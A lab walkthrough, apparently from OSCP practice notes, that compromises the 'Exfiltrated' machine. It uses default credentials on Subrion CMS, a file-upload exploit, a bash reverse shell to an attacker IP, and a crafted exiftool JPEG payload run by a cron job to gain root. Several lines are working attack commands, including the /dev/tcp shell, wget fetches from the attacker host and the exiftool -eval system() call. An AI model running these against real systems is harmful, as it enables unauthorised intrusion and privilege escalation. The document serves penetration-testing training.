> For the complete documentation index, see [llms.txt](https://aditya-3.gitbook.io/oscp/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aditya-3.gitbook.io/oscp/readme/walkthroughs/pg-practice/exfiltrated.md).

# Exfiltrated

## 80

Found a webpage run on subrion cms![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c1c66989f754eaebfa6a1dffc78fcf6ded49e2d0%2F14588aa3c80aa047fec95fef97b3f96e.png?alt=media)\
Found robots.txt ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-14892043515bac5ea3199a97cad93f5c8bfa3741%2F60dca9c1a6334efafbb3d85cfdfe71b0.png?alt=media)

Found login page with version disclosure: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-90caad91b24ab59f279819e9592d839c18d7c3c1%2F11a1f3530d98613de9b0afb3b8aa0155.png?alt=media)

Trying `admin : admin`: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-97a59c087c170def6729fa24e2837cb6aa7d9b48%2F825ed085b1b1336b9fd74112aca3a9c0.png?alt=media) We are logged in.

Now trying a file upload vulnerability <https://www.exploit-db.com/exploits/49876>:

```bash
python3 subrionfileup.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0769e820669c29db8e206d9c09a5fb45906945c1%2F3b168731940d884ba0416634edf5b7f3.png?alt=media) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-709a59c13a55414f3bd7db8aa574403c4224f732%2Fa9fbd2595f5bc0c4cc4b676c2b60d519.png?alt=media) Now transfering shell.sh:

```
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.167/8000 0>&1
```

and executing it: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-47c1f759f63f9b04b48c5b3b9ccfdeaad42a3f02%2F14883a31727b13d5133c6ff282ec2537.png?alt=media)

We get a full a TTY: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-008d53133bfc663f94b4a522b6b0d6fa1b7efb97%2F74ec8bc0eb3b565e420c5a304d87b393.png?alt=media)

Found some potential credentials: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-e16f6c4a80d28b981958569817f92fd5c34bf1b6%2F34c9c56d45faeb5e9289cc859443bb75.png?alt=media) Found some info: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-16a877403ceda02aeef9fd8ac4b82805d2d834c6%2F6921c6d36b58823a1c6b91b540fb81a5.png?alt=media)

Running linpeas found cronjob: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-cca172aee42b690556156179a7d497151815577c%2F0067abc56945d20942654f6728f09002.png?alt=media) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-fbe93a481cb89d2785d96ec9a49e4d4d3ed5fcbe%2F71f5603a5c5f80c31c0fef2cd0bd4ef3.png?alt=media) Now checking exiftool version: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-8c8e9c20c34c10d5035f0cc535bb22eca812fdc7%2F6083e73440bd0a0cdd3b63169ab36592.png?alt=media) <https://github.com/OneSecCyber/JPEG\\_RCE/tree/main> ExifTool 7.44 to 12.23 are vulnerable.

Our exiftool version is vulnerable to this exploit. Using the exiftool exploit Transfer the required files:

```
wget http://192.168.45.167/eval.config
wget http://192.168.45.167/runme.jpg
```

create a malicious image:

```
exiftool -config eval.config runme.jpg -eval='system("bash /var/www/html/subrion/uploads/shell.sh")'
```

in `/var/www/html/subrion/uploads`

## Lesson Learnt

Just because a script runs in cron and uses a specific binary it might not be tricking the script and might be about the version too
